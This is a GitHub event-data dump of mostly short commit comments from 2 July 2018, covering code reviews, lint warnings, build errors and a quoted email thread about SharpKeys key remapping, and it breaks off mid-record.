> sharpkeys@noreply.github.com <mailto:sharpkeys@noreply.github.com>  <mailto:sharpkeys@noreply.github.com> >\n>>>> >\n>>>> > > Cc: Randy <randy@randyrants.com  <mailto:randy@randyrants.com%20%3cmailto:randy@randyrants.com%25%0b> <mailto:randy@randyrants.com%\n>>>> 20%3cmailto:randy@randyrants.com> <mailto:randy@randyrants.com> >;\n>>>> > Comment <comment@noreply.github.com  <mailto:comment@noreply.github.com%20%3cmailto:%0b> <mailto:\n>>>> comment@noreply.github.com%20%3cmailto:comment@noreply.github.com <mailto:comment@noreply.github.com%20%3cmailto:comment@noreply.github.com> >\n>>>> <mailto:comment@noreply.github.com> >\n>>>> > > Subject: Re: [randyrants/sharpkeys] Update README.md (0174070)\n>>>> > >\n>>>> > >\n>>>> > >\n>>>> > > I just tried that, and rebooted. Same exact thing. BOTH right shift\n>>>> and\n>>>> > > caps lock work as caps lock. Is the registry corrupted?\n>>>> > >\n>>>> > > —\n>>>> > > You are receiving this because you commented.\n>>>> > > Reply to this email directly, view it on GitHub <\n>>>> > >\n>>>> >\n>>>> https://github.com/randyrants/sharpkeys/commit/01740704e7232d77fe11bd968d6b3d27fe2389f7#commitcomment-29524999\n>>>> > >\n>>>> > > , or mute the thread <\n>>>> > >\n>>>> >\n>>>> https://github.com/notifications/unsubscribe-auth/AR1oYsOnsmcR3f-uf9pHv4tlBb5Ye9Gxks5uBG6vgaJpZM4U6xPm\n>>>> > >\n>>>> > > . <\n>>>> > >\n>>>> >\n>>>> https://github.com/notifications/beacon/AR1oYgaIndzYM8ji42o-RW3JACSRzhbOks5uBG6vgaJpZM4U6xPm.gif\n>>>> > >\n>>>> > >\n>>>> > >\n>>>> > > —\n>>>> > > You are receiving this because you commented.\n>>>> > > Reply to this email directly, view it on GitHub\n>>>> > > <\n>>>> >\n>>>> https://github.com/randyrants/sharpkeys/commit/01740704e7232d77fe11bd968d6b3d27fe2389f7#commitcomment-29525211\n>>>> > >,\n>>>> > > or mute the thread\n>>>> > > <\n>>>> >\n>>>> https://github.com/notifications/unsubscribe-auth/AmxRXXE4a39fV8RbUJUNH73ViJO8-5CRks5uBHevgaJpZM4U6xPm\n>>>> > >\n>>>> > > .\n>>>> > >\n>>>> >\n>>>> >\n>>>> >\n>>>> > —\n>>>> > You are receiving this because you commented.\n>>>> > Reply to this email directly, view it on GitHub <\n>>>> >\n>>>> https://github.com/randyrants/sharpkeys/commit/01740704e7232d77fe11bd968d6b3d27fe2389f7#commitcomment-29525329\n>>>> >\n>>>> > , or mute the thread <\n>>>> >\n>>>> https://github.com/notifications/unsubscribe-auth/AR1oYh9bzj9w5fZ66sWyBPNgGu4U33snks5uBHtZgaJpZM4U6xPm\n>>>> >\n>>>> > . <\n>>>> >\n>>>> https://github.com/notifications/beacon/AR1oYlgZTvWf9Ho6E5btmqqbyftNEYP3ks5uBHtZgaJpZM4U6xPm.gif\n>>>> >\n>>>> >\n>>>> >\n>>>> > —\n>>>> > You are receiving this because you commented.\n>>>> > Reply to this email directly, view it on GitHub\n>>>> > <\n>>>> https://github.com/randyrants/sharpkeys/commit/01740704e7232d77fe11bd968d6b3d27fe2389f7#commitcomment-29525542\n>>>> >,\n>>>> > or mute the thread\n>>>> > <\n>>>> https://github.com/notifications/unsubscribe-auth/AmxRXS9tW80xUjas24P6F5EkwrHx2_S1ks5uBIChgaJpZM4U6xPm\n>>>> >\n>>>> > .\n>>>> >\n>>>>\n>>>>\n>>>>\n>>>> —\n>>>> You are receiving this because you commented.\n>>>> Reply to this email directly, view it on GitHub <\n>>>> https://github.com/randyrants/sharpkeys/commit/01740704e7232d77fe11bd968d6b3d27fe2389f7#commitcomment-29532659>\n>>>> , or mute the thread <\n>>>> https://github.com/notifications/unsubscribe-auth/AR1oYnu7M3WBdZG4H3unUd9YFEgXBOwCks5uBQO3gaJpZM4U6xPm>\n>>>> . <\n>>>> https://github.com/notifications/beacon/AR1oYtXCOjzNzl6WvaxNxUcmXZ_bI3UUks5uBQO3gaJpZM4U6xPm.gif>\n>>>>\n>>>>\n>>>> —\n>>>> You are receiving this because you commented.\n>>>> Reply to this email directly, view it on GitHub\n>>>> <https://github.com/randyrants/sharpkeys/commit/01740704e7232d77fe11bd968d6b3d27fe2389f7#commitcomment-29537679>,\n>>>> or mute the thread\n>>>> <https://github.com/notifications/unsubscribe-auth/AmxRXZGhA-7F8vXk1ltq_sit1Y3vL0nTks5uBWohgaJpZM4U6xPm>\n>>>> .\n>>>>\n>>>\n\n\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub <https://github.com/randyrants/sharpkeys/commit/01740704e7232d77fe11bd968d6b3d27fe2389f7#commitcomment-29553278> , or mute the thread <https://github.com/notifications/unsubscribe-auth/AR1oYhx2bvxwwU87KMYRzB5bjo7TgEZ6ks5uBy4RgaJpZM4U6xPm> .  <https://github.com/notifications/beacon/AR1oYkOEOCDhHBUf-DtlPI4kZfXrI_hsks5uBy4RgaJpZM4U6xPm.gif> \n\n"}},"created_at":"2018-07-02T04:32:36Z"}
{"id":"7904437423","type":"CommitCommentEvent","actor":{"login":"SumedhBhave"},"repo":{"name":"carufus/bbq-samiksha-app"},"payload":{"comment":{"id":29561076,"position":31,"line":44,"path":"app/src/main/java/com/app/bbq/samiksha/QuestionnaireActivity.java","commit_id":"251e5c8bcfaac9dba171b45d98b21f70c457f631","created_at":"2018-07-02T04:33:53Z","updated_at":"2018-07-02T04:33:53Z","author_association":"NONE","body":"What is the use of this flag? "}},"created_at":"2018-07-02T04:33:53Z"}
{"id":"7904437766","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561077,"position":30,"line":30,"path":"src/IOPort.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:34:04Z","updated_at":"2018-07-02T04:34:04Z","author_association":"OWNER","body":"Потому что IOPort не владеет самим портом, а содержит лишь ссылку на порт!"}},"created_at":"2018-07-02T04:34:04Z"}
{"id":"7904442048","type":"CommitCommentEvent","actor":{"login":"Perry961002"},"repo":{"name":"Perry961002/LeetCode"},"payload":{"comment":{"id":29561081,"position":null,"line":null,"path":null,"commit_id":"611c5e3d755301b7c5c4731aa598b011b4f6db7c","created_at":"2018-07-02T04:36:07Z","updated_at":"2018-07-02T04:36:07Z","author_association":"OWNER","body":"两数之和"}},"created_at":"2018-07-02T04:36:07Z"}
{"id":"7904444096","type":"CommitCommentEvent","actor":{"login":"Crumdidlyumshis"},"repo":{"name":"ElvUI-Vanilla/ElvUI"},"payload":{"comment":{"id":29561084,"position":null,"line":null,"path":null,"commit_id":"8fd70922dad394f488408819722129b14932f28f","created_at":"2018-07-02T04:37:09Z","updated_at":"2018-07-02T04:37:09Z","author_association":"CONTRIBUTOR","body":"fix #35 "}},"created_at":"2018-07-02T04:37:09Z"}
{"id":"7904444272","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561086,"position":18,"line":32,"path":"CHANGELOG.zh-CN.md","commit_id":"7123a6da593c0a6fd396abd3ed419de1c53af2e8","created_at":"2018-07-02T04:37:15Z","updated_at":"2018-07-02T04:37:15Z","author_association":"MEMBER","body":"没有新增，只是文档更新。"}},"created_at":"2018-07-02T04:37:15Z"}
{"id":"7904445593","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561087,"position":14,"line":28,"path":"CHANGELOG.zh-CN.md","commit_id":"7123a6da593c0a6fd396abd3ed419de1c53af2e8","created_at":"2018-07-02T04:37:55Z","updated_at":"2018-07-02T04:37:55Z","author_association":"MEMBER","body":"也没有添加，只是修复类型定义。"}},"created_at":"2018-07-02T04:37:55Z"}
{"id":"7904448293","type":"CommitCommentEvent","actor":{"login":"ittaiz"},"repo":{"name":"bazelbuild/rules_scala"},"payload":{"comment":{"id":29561094,"position":null,"line":null,"path":null,"commit_id":"e0bb5aef32e178a8225eec62ceae2a700548d423","created_at":"2018-07-02T04:39:24Z","updated_at":"2018-07-02T04:39:24Z","author_association":"MEMBER","body":"@jhnj I think you might need to copy this change into your PR when you rebase on top of master. I think this is a 2.12 related breakage but OTOH you might be ok since your \"master\" version is 2.11"}},"created_at":"2018-07-02T04:39:24Z"}
{"id":"7904448737","type":"CommitCommentEvent","actor":{"login":"sourabhparime"},"repo":{"name":"sourabhparime/Mooc-Certifications"},"payload":{"comment":{"id":29561096,"position":null,"line":null,"path":null,"commit_id":"0b6fca2483db23ad5e306327432c21e5b5f6c572","created_at":"2018-07-02T04:39:38Z","updated_at":"2018-07-02T04:39:38Z","author_association":"OWNER","body":"Merge"}},"created_at":"2018-07-02T04:39:38Z"}
{"id":"7904449642","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561099,"position":15,"line":29,"path":"CHANGELOG.zh-CN.md","commit_id":"7123a6da593c0a6fd396abd3ed419de1c53af2e8","created_at":"2018-07-02T04:40:05Z","updated_at":"2018-07-02T04:40:05Z","author_association":"MEMBER","body":"修复 `Pagination` 全局 `locale` 设置不能被组件 `locale` 覆盖的问题。"}},"created_at":"2018-07-02T04:40:05Z"}
{"id":"7904450560","type":"CommitCommentEvent","actor":{"login":"yesmeck"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29561101,"position":16,"line":30,"path":"CHANGELOG.zh-CN.md","commit_id":"7123a6da593c0a6fd396abd3ed419de1c53af2e8","created_at":"2018-07-02T04:40:31Z","updated_at":"2018-07-02T04:40:31Z","author_association":"MEMBER","body":"这个也是修复。"}},"created_at":"2018-07-02T04:40:31Z"}
{"id":"7904451362","type":"CommitCommentEvent","actor":{"login":"ittaiz"},"repo":{"name":"bazelbuild/rules_scala"},"payload":{"comment":{"id":29561103,"position":null,"line":null,"path":null,"commit_id":"ccb9d3b29dee0d1dc99690b5187f761f05dbba7d","created_at":"2018-07-02T04:40:51Z","updated_at":"2018-07-02T04:40:51Z","author_association":"MEMBER","body":"@johnynek @jhnj @ianoc @gkk-stripe I tried to get scrooge/thrift working on top of master and 2.12 but had to give up after a few hours. This is of course just a side branch so you can probably ignore it given #544 is coming soon"}},"created_at":"2018-07-02T04:40:51Z"}
{"id":"7904456854","type":"CommitCommentEvent","actor":{"login":"GustavoKikey"},"repo":{"name":"pdroaugust/waytickets"},"payload":{"comment":{"id":29561114,"position":null,"line":null,"path":null,"commit_id":"fa7326449dd8b62a10ab89cb4176c8ab7d274959","created_at":"2018-07-02T04:43:25Z","updated_at":"2018-07-02T04:43:25Z","author_association":"COLLABORATOR","body":"Deixei os preços que são mostrados no desenha_mesa como se fosse cobrado por pessoa ao invés do preço da mesa inteira.\r\n\r\nAdicionei uma verificação na hora de escolher a mesa, ao invés de verificar apenas depois de digitar a quantidade de lugares."}},"created_at":"2018-07-02T04:43:25Z"}
{"id":"7904459070","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561120,"position":60,"line":32,"path":"src/System.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:44:33Z","updated_at":"2018-07-02T04:44:33Z","author_association":"OWNER","body":"А можно сюда же прописать конструктор по умолчанию? Например:\r\nname(); \\"}},"created_at":"2018-07-02T04:44:33Z"}
{"id":"7904463277","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29561132,"position":null,"line":null,"path":null,"commit_id":"f7322c05adb214aca16cbf17bc86bbf640c845a1","created_at":"2018-07-02T04:46:39Z","updated_at":"2018-07-02T04:46:39Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/cleanupuploads-job-never-completes-leading-to-sidekiq-hanging-and-restarting/90180/40\n"}},"created_at":"2018-07-02T04:46:39Z"}
{"id":"7904465347","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29561135,"position":null,"line":null,"path":null,"commit_id":"ce4d57c10d0e1bb05d8bddeb3e3a0b630b61b2ac","created_at":"2018-07-02T04:47:41Z","updated_at":"2018-07-02T04:47:41Z","author_association":"NONE","body":"Notice: Driver v5.2.20.2 released from the same repo 6 hours ago."}},"created_at":"2018-07-02T04:47:41Z"}
{"id":"7904467957","type":"CommitCommentEvent","actor":{"login":"kbn2778"},"repo":{"name":"lcw921/PMS"},"payload":{"comment":{"id":29561143,"position":null,"line":null,"path":null,"commit_id":"e04b6b3ea6f0082b1983427a0a89b46334a3e5b5","created_at":"2018-07-02T04:48:58Z","updated_at":"2018-07-02T04:48:58Z","author_association":"COLLABORATOR","body":"I can't write proper component about commit due to press enter by mistake."}},"created_at":"2018-07-02T04:48:58Z"}
{"id":"7904474552","type":"CommitCommentEvent","actor":{"login":"rmunn"},"repo":{"name":"NinoFloris/Saturn"},"payload":{"comment":{"id":29561155,"position":null,"line":null,"path":null,"commit_id":"0f05a780bb257dd57792d9f0bfbb5228e4b44679","created_at":"2018-07-02T04:52:05Z","updated_at":"2018-07-02T04:52:05Z","author_association":"NONE","body":"As a matter of style preference, I'd rather see this written using `List.fold`. For example, the `Application.fs` code change would look like this:\r\n\r\n```fsharp\r\nlet router = (state.Pipelines |> List.fold (fun acc e -> e >=> acc) succeed) >=> router\r\n```\r\n\r\nI'd suggest the same thing (`List.fold` over `List.foldBack`) for the other two code changes in `Controller.fs` and `Router.fs` as well.\r\n\r\nThe advantage of using `List.fold` here over `List.foldBack` is simplicity: it's slightly easier to track what's happening with `List.fold` in your head when reading the code. (And the F# implementation is simpler as well).\r\n\r\nThe difference between the `List.foldBack` implementation in the PR as it stands, and the `List.fold` implementation that I'm suggesting, would be the order in which composition happens: left-to-right or right-to-left. An example of what I mean is probably best: say you have an application which pipes requests through three different pipelines:\r\n\r\n```fsharp\r\nlet app = application {\r\n    pipe_through pipeA\r\n    pipe_through pipeB\r\n    pipe_through pipeC\r\n}\r\n```\r\n\r\nFrom this CE, the `application` CE builder produces a list of pipelines `[C; B; A]`. The `foldBack` implementation suggested here would then compose these pipelines in the following order:\r\n\r\n```text\r\nsucceed >=> A\r\n(succeed >=> A) >=> B\r\n((succeed >=> A) >=> B) >=> C\r\n(((succeed >=> A) >=> B) >=> C) >=> router\r\n```\r\n\r\nThe `List.fold` implementation I'm suggesting, OTOH, would compose the pipelines as follows:\r\n\r\n```text\r\nC >=> succeed\r\nB >=> (C >=> succeed)\r\nA >=> (B >=> (C >=> succeed))\r\n(A >=> (B >=> (C >=> succeed))) >=> router\r\n```\r\n\r\nAs long as the end-user has not created pipelines that have side effects when evaluated, then the order of composition shouldn't matter and the `List.fold` implementation wins on principles of simplicity. But if end users create pipelines with side effects somehow, then it might be important to let those side effects happen in the same order that the pipelines are declared in the source file. If that's an important design goal, then the way @NinoFloris wrote this PR is good because it will trigger the side effects of pipeline `A` before the side effects of pipeline `B` are triggered. (Those side effects will, of course, only be triggered once, which will probably surprise the end-user: anyone who creates pipelines with side effects has probably not fully understood the functional approach yet. And if they then specify `use_warbler`, their side effects won't be triggered at compose time and there will be no difference between the `List.fold` and `List.foldBack` approaches).\r\n\r\nP.S. This comment came out more complicated than I was expecting; I hope I have been able to be clear."}},"created_at":"2018-07-02T04:52:05Z"}
{"id":"7904476223","type":"CommitCommentEvent","actor":{"login":"piratesephiroth"},"repo":{"name":"ahezard/nds-bootstrap"},"payload":{"comment":{"id":29561158,"position":null,"line":null,"path":null,"commit_id":"b8f48d370c614471d77f0a9db93717c70e74dc32","created_at":"2018-07-02T04:52:53Z","updated_at":"2018-07-02T04:52:53Z","author_association":"CONTRIBUTOR","body":"yep, waking from sleep mode fixes it.\r\n\r\nBy the wy the latest commit only gives me white screens when I try to run any game."}},"created_at":"2018-07-02T04:52:53Z"}
{"id":"7904477861","type":"CommitCommentEvent","actor":{"login":"joelagnel"},"repo":{"name":"joelagnel/androdeb"},"payload":{"comment":{"id":29561163,"position":null,"line":null,"path":null,"commit_id":"d90662d255cb53efadaf10d3064eea0ebc6f36e9","created_at":"2018-07-02T04:53:40Z","updated_at":"2018-07-02T04:53:40Z","author_association":"OWNER","body":"@ErickReyesR "}},"created_at":"2018-07-02T04:53:40Z"}
{"id":"7904483032","type":"CommitCommentEvent","actor":{"login":"ZhennanQin"},"repo":{"name":"TaoLv/incubator-mxnet"},"payload":{"comment":{"id":29561175,"position":138,"line":138,"path":"src/operator/subgraph/mkldnn/mkldnn_conv_bn.cc","commit_id":"819ba51881a983b3f58bddae40ffe360d4884852","created_at":"2018-07-02T04:56:09Z","updated_at":"2018-07-02T04:56:09Z","author_association":"NONE","body":"bias is optional, you have to check param.no_bias. Thus below bn parameter will get incorrect data also."}},"created_at":"2018-07-02T04:56:09Z"}
{"id":"7904484380","type":"CommitCommentEvent","actor":{"login":"Josh4you"},"repo":{"name":"HackerShackOfficial/AI-Smart-Mirror"},"payload":{"comment":{"id":29561177,"position":null,"line":null,"path":null,"commit_id":"b8f7f4a0797478197714ffccdb9a4f6dac46d5d4","created_at":"2018-07-02T04:56:49Z","updated_at":"2018-07-02T04:56:49Z","author_association":"NONE","body":"@OllieBoi  have you install npm and git for your raspberry pi. if not try installing them first \r\n"}},"created_at":"2018-07-02T04:56:49Z"}
{"id":"7904488882","type":"CommitCommentEvent","actor":{"login":"suddong"},"repo":{"name":"suddong/suddong.github.io"},"payload":{"comment":{"id":29561183,"position":null,"line":null,"path":null,"commit_id":"aa7ce05df009d69e60158d8aa61d12a532a8f791","created_at":"2018-07-02T04:59:01Z","updated_at":"2018-07-02T04:59:01Z","author_association":"OWNER","body":"szq"}},"created_at":"2018-07-02T04:59:01Z"}
{"id":"7904489470","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561185,"position":82,"line":52,"path":"src/System.h","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T04:59:19Z","updated_at":"2018-07-02T04:59:19Z","author_association":"OWNER","body":"Вот здесь различия между сериями контроллеров. Значит будем через препроцессор разруливать?"}},"created_at":"2018-07-02T04:59:19Z"}
{"id":"7904493077","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29561197,"position":null,"line":null,"path":null,"commit_id":"5dbc14cca38949a761378ec6f592b34b9424af6a","created_at":"2018-07-02T05:00:40Z","updated_at":"2018-07-02T05:00:40Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-02T05:00:40Z"}
{"id":"7904493671","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29561198,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-02T05:00:56Z","updated_at":"2018-07-02T05:00:56Z","author_association":"OWNER","body":"[f02072018050043_encrypt.txt](https://github.com/githubuserdlp/TEST/files/2153806/f02072018050043_encrypt.txt)\r\n"}},"created_at":"2018-07-02T05:00:56Z"}
{"id":"7904501964","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29561204,"position":1,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/Adapter/ListItemAdapter.java","commit_id":"864d00ac1b907b37dc4d9c280cd3f5b64969bb9c","created_at":"2018-07-02T05:04:38Z","updated_at":"2018-07-02T05:04:38Z","author_association":"NONE","body":"WARNING: [PackageCase] Package name contains upper case characters\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#PackageCase"}},"created_at":"2018-07-02T05:04:38Z"}
{"id":"7904501974","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29561205,"position":110,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/Adapter/ListItemAdapter.java","commit_id":"864d00ac1b907b37dc4d9c280cd3f5b64969bb9c","created_at":"2018-07-02T05:04:38Z","updated_at":"2018-07-02T05:04:38Z","author_association":"NONE","body":"WARNING: [IfStmtsMustUseBraces] Avoid using if statements without curly braces\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/braces.html#IfStmtsMustUseBraces"}},"created_at":"2018-07-02T05:04:38Z"}
{"id":"7904501980","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29561206,"position":1,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/Menu/MenuActivity.java","commit_id":"864d00ac1b907b37dc4d9c280cd3f5b64969bb9c","created_at":"2018-07-02T05:04:38Z","updated_at":"2018-07-02T05:04:38Z","author_association":"NONE","body":"WARNING: [PackageCase] Package name contains upper case characters\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#PackageCase"}},"created_at":"2018-07-02T05:04:38Z"}
{"id":"7904502085","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29561207,"position":15,"line":null,"path":"app/src/at-lambui/AndroidManifest.xml","commit_id":"864d00ac1b907b37dc4d9c280cd3f5b64969bb9c","created_at":"2018-07-02T05:04:41Z","updated_at":"2018-07-02T05:04:41Z","author_association":"NONE","body":"WARNING: [InnerclassSeparator] Use '$' instead of '.' for inner classes (or use only lowercase letters in package names); replace \".Menu.MenuActivity\" with \".Menu$MenuActivity\"\n When you reference an inner class in a manifest file, you must use '$' instead of '.' as the separator character, i.e. Outer$Inner instead of Outer.Inner.\n\n(If you get this warning for a class which is not actually an inner class, it's because you are using uppercase characters in your package name, which is not conventional.)"}},"created_at":"2018-07-02T05:04:41Z"}
{"id":"7904506864","type":"CommitCommentEvent","actor":{"login":"techAPJ"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29561212,"position":null,"line":null,"path":null,"commit_id":"f7322c05adb214aca16cbf17bc86bbf640c845a1","created_at":"2018-07-02T05:06:52Z","updated_at":"2018-07-02T05:06:52Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-02T05:06:52Z"}
{"id":"7904512199","type":"CommitCommentEvent","actor":{"login":"LTTTTTE"},"repo":{"name":"LTTTTTE/Cocos"},"payload":{"comment":{"id":29561223,"position":null,"line":null,"path":null,"commit_id":"b51932972beb43b146dc850254632cf92fea1e65","created_at":"2018-07-02T05:09:26Z","updated_at":"2018-07-02T05:09:26Z","author_association":"OWNER","body":"이코드는 잘못 커밋한것임"}},"created_at":"2018-07-02T05:09:26Z"}
{"id":"7904521200","type":"CommitCommentEvent","actor":{"login":"ZhennanQin"},"repo":{"name":"TaoLv/incubator-mxnet"},"payload":{"comment":{"id":29561237,"position":85,"line":155,"path":"src/operator/subgraph/mkldnn/mkldnn_conv_bn.cc","commit_id":"4aa1647403a424a4e6b4b8c48b493c85844b7a3b","created_at":"2018-07-02T05:13:13Z","updated_at":"2018-07-02T05:13:13Z","author_association":"NONE","body":"This doesn't equivalent with deleted line: if !no_bias, this is checking  bn_beta  and bn_gamma, else this is checking bn_gamma and conv_bias. Is this the check you want?"}},"created_at":"2018-07-02T05:13:13Z"}
{"id":"7904524442","type":"CommitCommentEvent","actor":{"login":"B3HZAD"},"repo":{"name":"B3HZAD/site-test"},"payload":{"comment":{"id":29561241,"position":2,"line":2,"path":"README.md","commit_id":"88bd8ec8d33793b36a79954c4146be61d5e465dc","created_at":"2018-07-02T05:14:36Z","updated_at":"2018-07-02T05:14:36Z","author_association":"OWNER","body":"good\r\n"}},"created_at":"2018-07-02T05:14:36Z"}
{"id":"7904525064","type":"CommitCommentEvent","actor":{"login":"B3HZAD"},"repo":{"name":"B3HZAD/site-test"},"payload":{"comment":{"id":29561246,"position":1,"line":1,"path":"README.md","commit_id":"88bd8ec8d33793b36a79954c4146be61d5e465dc","created_at":"2018-07-02T05:14:52Z","updated_at":"2018-07-02T05:14:52Z","author_association":"OWNER","body":"bad"}},"created_at":"2018-07-02T05:14:52Z"}
{"id":"7904528261","type":"CommitCommentEvent","actor":{"login":"ZhennanQin"},"repo":{"name":"TaoLv/incubator-mxnet"},"payload":{"comment":{"id":29561255,"position":79,"line":145,"path":"src/operator/subgraph/mkldnn/mkldnn_conv_bn.cc","commit_id":"4aa1647403a424a4e6b4b8c48b493c85844b7a3b","created_at":"2018-07-02T05:16:17Z","updated_at":"2018-07-02T05:16:17Z","author_association":"NONE","body":"I prefer not directly removing this, but fix this according no_bias. Code becomes more harder to read for replacing with inputs[n]."}},"created_at":"2018-07-02T05:16:17Z"}
{"id":"7904530157","type":"CommitCommentEvent","actor":{"login":"mjk0618"},"repo":{"name":"lcw921/PMS"},"payload":{"comment":{"id":29561259,"position":null,"line":null,"path":null,"commit_id":"95c73aa51b36d918df5fd0dadd2c4846fab76df0","created_at":"2018-07-02T05:17:08Z","updated_at":"2018-07-02T05:17:08Z","author_association":"COLLABORATOR","body":"현수가 push 한 거랑 confilct 나서 고치느라 두 번 보냈어요\r\n이 Commit는 의미 없는 거예요"}},"created_at":"2018-07-02T05:17:08Z"}
{"id":"7904536209","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561269,"position":148,"line":115,"path":"src/System.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T05:19:47Z","updated_at":"2018-07-02T05:19:47Z","author_association":"OWNER","body":"Как-то получается не к месту здесь этот метод. Есть же класс HalDevice со своими методами включения/выключения тактирования."}},"created_at":"2018-07-02T05:19:47Z"}
{"id":"7904536501","type":"CommitCommentEvent","actor":{"login":"ZhennanQin"},"repo":{"name":"TaoLv/incubator-mxnet"},"payload":{"comment":{"id":29561270,"position":36,"line":73,"path":"src/operator/subgraph/mkldnn/mkldnn_conv_bn.cc","commit_id":"4aa1647403a424a4e6b4b8c48b493c85844b7a3b","created_at":"2018-07-02T05:19:54Z","updated_at":"2018-07-02T05:19:54Z","author_association":"NONE","body":"I'm not expert for conv+bn folding, but here's a potential bug, you can have a look. When (bias_ptr ==nullptr), update_bias_ptr should be beta_ptr, and set param.no_bias = false. As for as I know, after folding, convolution must have bias."}},"created_at":"2018-07-02T05:19:54Z"}
{"id":"7904537627","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29561273,"position":null,"line":null,"path":null,"commit_id":"5d6682c9ae228678b83a9f05f3af8c59ace13286","created_at":"2018-07-02T05:20:21Z","updated_at":"2018-07-02T05:20:21Z","author_association":"CONTRIBUTOR","body":"I used the notepad++"}},"created_at":"2018-07-02T05:20:21Z"}
{"id":"7904537736","type":"CommitCommentEvent","actor":{"login":"ZhennanQin"},"repo":{"name":"TaoLv/incubator-mxnet"},"payload":{"comment":{"id":29561274,"position":null,"line":null,"path":null,"commit_id":"4aa1647403a424a4e6b4b8c48b493c85844b7a3b","created_at":"2018-07-02T05:20:24Z","updated_at":"2018-07-02T05:20:24Z","author_association":"NONE","body":"Some comments about bias change."}},"created_at":"2018-07-02T05:20:24Z"}
{"id":"7904556621","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29561313,"position":61,"line":73,"path":"examples/STM32F405RG/src/main.cpp","commit_id":"22309d44da61967decab4ba0cf1876914c87215a","created_at":"2018-07-02T05:28:27Z","updated_at":"2018-07-02T05:28:27Z","author_association":"OWNER","body":"Может быть названия методов класса System не очень (initSMTHNG). Они больше похоже на привычные сеттеры, поскольку фактическая инициализация осуществляется в методе start."}},"created_at":"2018-07-02T05:28:27Z"}
{"id":"7904557193","type":"CommitCommentEvent","actor":{"login":"Paul-Wray"},"repo":{"name":"doug-moen/curv"},"payload":{"comment":{"id":29561314,"position":null,"line":null,"path":null,"commit_id":"569fad4cae1d755f5f3db7087c9baff01fd9a13b","created_at":"2018-07-02T05:28:42Z","updated_at":"2018-07-02T05:28:42Z","author_association":"NONE","body":"Progress! Now libcurv build completes, but we have a similar error building glsviewer:\r\n\r\n/Users/Paul/curv/extern/glslViewer/src/gl/gl.h:3:10: fatal error: 'GLFW/glfw3.h' file not found"}},"created_at":"2018-07-02T05:28:42Z"}
{"id":"7904558395","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29561316,"position":null,"line":null,"path":null,"commit_id":"b4b63ce4de2b3b4c39ff7fa6caf67564de5c9495","created_at":"2018-07-02T05:29:09Z","updated_at":"2018-07-02T05:29:09Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180702-052908 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180702-052908\") to 